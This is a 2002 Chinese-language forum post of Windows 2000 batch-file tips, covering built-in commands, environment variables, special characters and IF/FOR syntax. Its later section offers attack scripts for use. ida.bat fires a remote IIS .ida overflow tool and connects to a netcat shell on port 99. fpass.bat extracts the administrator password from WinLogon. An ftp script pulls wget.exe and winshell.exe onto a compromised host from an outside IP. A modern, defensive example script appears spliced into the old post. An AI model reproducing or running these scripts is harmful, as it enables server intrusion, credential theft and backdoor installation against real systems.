163 加中网 (Canada-China Net), Manitoba Chinese portal | Winnipeg Chinese Forum
Title: Win2000 command-line batch (BAT) file tips
Author: tool_guy (guest)
Time: 2002-11-28 14:20
Article structure
1. Help for all built-in commands
2. The concept of environment variables
3. Built-in special characters (avoid them in actual use)
4. Simple batch file concepts
5. Attachment 1 tmp.txt
6. Attachment 2 sample.bat

######################################################################
1. Help for all built-in commands
######################################################################
ver
cmd /?
set /?
rem /?
if /?
echo /?
goto /?
for /?
shift /?
call /?
Other commonly needed commands
type /?
find /?
findstr /?
copy /?
______________________________________________________________________
Next, write all of the help above into one file
echo ver >tmp.txt
ver >>tmp.txt
echo cmd /? >>tmp.txt
cmd /? >>tmp.txt
echo rem /? >>tmp.txt
rem /? >>tmp.txt
echo if /? >>tmp.txt
if /? >>tmp.txt
echo goto /? >>tmp.txt
goto /? >>tmp.txt
echo for /? >>tmp.txt
for /? >>tmp.txt
echo shift /? >>tmp.txt
shift /? >>tmp.txt
echo call /? >>tmp.txt
call /? >>tmp.txt
echo type /? >>tmp.txt
type /? >>tmp.txt
echo find /? >>tmp.txt
find /? >>tmp.txt
echo findstr /? >>tmp.txt
findstr /? >>tmp.txt
echo copy /? >>tmp.txt
copy /? >>tmp.txt
type tmp.txt
______________________________________________________

######################################################################
2. The concept of environment variables
######################################################################
_____________________________________________________________________________
C:\Program Files>set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=FIRST
ComSpec=C:\WINNT\system32\cmd.exe
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:\WINNT\system32\os2\dll;
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0605
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINNT
TEMP=C:\WINNT\TEMP
TMP=C:\WINNT\TEMP
USERPROFILE=C:\Documents and Settings\Default User
windir=C:\WINNT
_____________________________________________________________________________

path: the search path for executable programs. My suggestion is that you copy your program into the
%windir%\system32\. directory; then it is generally found automatically.
Syntax: copy mychenxu.exe %windir%\system32\.
Using the dot (.) makes it clear at a glance.
References to environment variables use paired (English-mode, half-width) marks:
%windir%      variable
%%windir%%    second-level (double) variable reference
Others we commonly use:
%temp%        temporary file directory
%windir%      system directory
%errorlevel%  exit code

Write output files into the temporary file directory; this keeps the current directory tidy.

For parameters containing spaces you should learn to use double quotes (""), for example when operating on the Program Files folder:
C:\>dir p*
 Directory of C:\
2000-09-02 11:47 2,164 PDOS.DEF
1999-01-03 00:47 <DIR> Program Files
 1 File(s) 2,164 bytes
 1 Dir(s) 1,505,997,824 bytes free

C:\>cd pro*
C:\Program Files>

C:\>
C:\>cd "Program Files"
C:\Program Files>

######################################################################
3. Built-in special characters (avoid them in actual use)
######################################################################
Microsoft reserves the following built-in names and characters; they cannot be used in the name of a file you create:
con nul aux \ / | || && ^ > < *

You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples:
(Roughly: either you use ^ as the leading escape character, or you have no choice but to use double quotes "")
To create the variable value new&name, type:
set varname=new^&name

To create the variable value "new&name", type:
set varname="new&name"

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments.

find "Pacific Rim" < trade.txt > nwtrade.txt
IF EXIST filename. (del filename.) ELSE echo filename. missing

>    creates a file
>>   appends to the end of a file
@    prefix character: the line itself is not shown in cmd when executed; echo off can be used to turn display off
^    leading escape character for the special characters (> < &). The first line only displays "aaa"; the second writes to the file bbb
 echo 123456 ^> aaa
 echo 1231231 > bbb
()   groups commands
 (echo aa & echo bb)
,    default separator, same as a space
;    comment; indicates that what follows is a comment
:    label
|    pipe operation
&    Usage: command1 & command2 [& command3...]
 This way several commands are run in sequence regardless of whether each one succeeds
 dir c:\*.exe & dir d:\*.exe & dir e:\*.exe
&&   Usage: command1 && command2 [&& command3...]
 Once a command fails, the commands after it are not executed; if none fails, all commands run to the end
||   Usage: command1 || command2 [|| command3...]
 Once a command succeeds, the commands after it are not executed; if none succeeds, all commands run to the end

Common syntax forms
IF [NOT] ERRORLEVEL number command para1 para2
IF [NOT] string1==string2 command para1 para2
IF [NOT] EXIST filename command para1 para2

IF EXIST filename command para1 para2
IF NOT EXIST filename command para1 para2
IF "%1"=="" goto END
IF "%1"=="net" goto NET
IF NOT "%2"=="net" goto OTHER
IF ERRORLEVEL 1 command para1 para2
IF NOT ERRORLEVEL 1 command para1 para2
FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k
The parameters are taken in alphabetical order: i j k l m n o p q.
 eol=c     - specifies an end-of-line comment character (just one)
 skip=n    - the number of lines to skip at the start of the file
 delims=xxx - specifies a delimiter set. This replaces the default delimiter set of space and tab.

######################################################################
4. Simple batch file concepts
######################################################################

echo This is test > a.txt
type a.txt
echo This is test 11111 >> a.txt
type a.txt
echo This is test 22222 > a.txt
type a.txt
The second echo appends
The third echo empties a.txt and recreates a.txt

netstat -n | find "3389"
This lists the IPs of all users connected to 3389.

________________test.bat___________________________________________________
@echo please care
echo please care 1111
echo please care 2222
echo please care 3333
@echo please care
@echo please care 1111
@echo please care 2222
@echo please care 3333
rem the comment statement is not displayed, but this line itself is displayed
@rem the comment statement is not displayed, and this line is not displayed either
@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)
@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)
___________________________________________________________________________

Below we take a concrete program, idahack (the ida remote overflow), as the example. It should be very simple.

___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"

@if "%1"=="" goto USAGE
@if NOT "%2"=="" goto SP2

:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [good luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END

:SP2
@rem the service-pack number comes in as %2; output is redirected the same way as in :start
@idahack.exe %1 80 %2 99 >%temp%\_tmp
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END

:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)

:END
_____________________ida.bat__END_________________________________

Now the second file: getting the administrator's password.
Most people say it cannot be obtained; actually it is because they did not enter the correct information.

___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe"

@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%\_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%\_findpass.txt
@goto END

:USAGE
@pulist.exe >%temp%\_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"

:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________

One more: you have already logged into a remote host via telnet; how do you upload files (win)?
Type the lines below into the window one by one. Of course you can also copy all of it and Ctrl+V it over. Then just wait!!

echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w
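As an added example that is not part of the original post or its tools, the script below combines the post's points in one place: a quoted argument check, a scratch file under %temp%, ^ escaping, && / || chaining, the errorlevel semantics the ida.bat script relies on, and a FOR /F parse of the `netstat -n | find "3389"` output from section 4. The port argument, the _conn_PORT.txt file name and the sample netstat line quoted in the comments are assumptions made for illustration only.

```batch
@echo off
rem Added example, not from the original post. Combines the post's points:
rem quoted argument checks, %temp% scratch files, ^ escaping, && / || chaining,
rem errorlevel tests and a FOR /F parse of "netstat -n" for the port-3389 case.
rem The port argument, the _conn_PORT.txt file name and the sample netstat line
rem in the comments are assumptions made for illustration only.
setlocal enabledelayedexpansion

rem 1. Quote both sides of the comparison so an empty %1 still parses.
if "%~1"=="" goto USAGE
set "PORT=%~1"

rem 2. Validate before using the value unquoted anywhere: !PORT! is expanded
rem    after the line has been parsed, so an "&", "|" or "^" inside the
rem    argument is data, not a command. With %PORT% on this line the
rem    injected command would already have run before findstr saw it.
echo !PORT!| findstr /r "^[0-9][0-9]*$" >nul || goto USAGE

rem 3. Scratch file in %temp%, as the post recommends, to keep the cwd tidy.
set "OUT=%temp%\_conn_%PORT%.txt"

rem 4. Escaped special characters are displayed literally instead of acting
rem    as pipe or redirection.
echo Running: netstat -n ^| find ":%PORT% " ^> "%OUT%"

rem 5. && runs the next command only on success, || only on failure.
rem    find exits 0 when at least one line matched and 1 when none did.
netstat -n | find ":%PORT% " > "%OUT%" && echo Matches saved to "%OUT%" || echo No connections on port %PORT%

rem 6. FOR /F parse. A netstat -n line looks like this constructed sample:
rem      TCP    192.0.2.10:3389      198.51.100.7:51234     ESTABLISHED
rem    With the default delimiters, space and tab, tokens 2,3,4 are the
rem    local address, the foreign address and the state.
set /a COUNT=0
for /f "tokens=2,3,4" %%a in ('type "%OUT%"') do (
    set /a COUNT+=1
    rem Split the foreign ip:port on the colon, IPv4 form only.
    for /f "tokens=1,2 delims=:" %%x in ("%%b") do (
        echo   remote=%%x  remote_port=%%y  state=%%c
    )
)
echo Total: !COUNT! connection(s) on port %PORT%

rem 7. "if errorlevel 1" is true for ANY exit code of 1 or higher, so the
rem    post's "if not errorlevel 1" means "the previous command succeeded".
rem    Set an explicit exit code here so a caller can chain with && / ||.
if !COUNT! GTR 0 (exit /b 0) else (exit /b 1)

:USAGE
echo Usage:   %~nx0 PORT
echo Example: %~nx0 3389
exit /b 2
```

Run it as `conn.bat 3389` (file name assumed). Passing `3389&calc` as the argument prints the string unchanged and falls through to USAGE, because step 2 expands the value with delayed expansion after cmd has already tokenized the line; the same value substituted through `%1`, as in ida.bat, would be executed. The colon split in step 6 assumes IPv4 addresses; an IPv6 entry such as `[::1]:3389` contains further colons and needs its own handling.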
Author: GregoryTug
Time: 2024-6-22 22:05
Author: GregoryTug
Time: 2024-6-22 22:06
Welcome to 163 加中网 (Canada-China Net), Manitoba Chinese portal | Winnipeg Chinese Forum (http://appdev.163.ca/dz163/)
Powered by Discuz! X3.2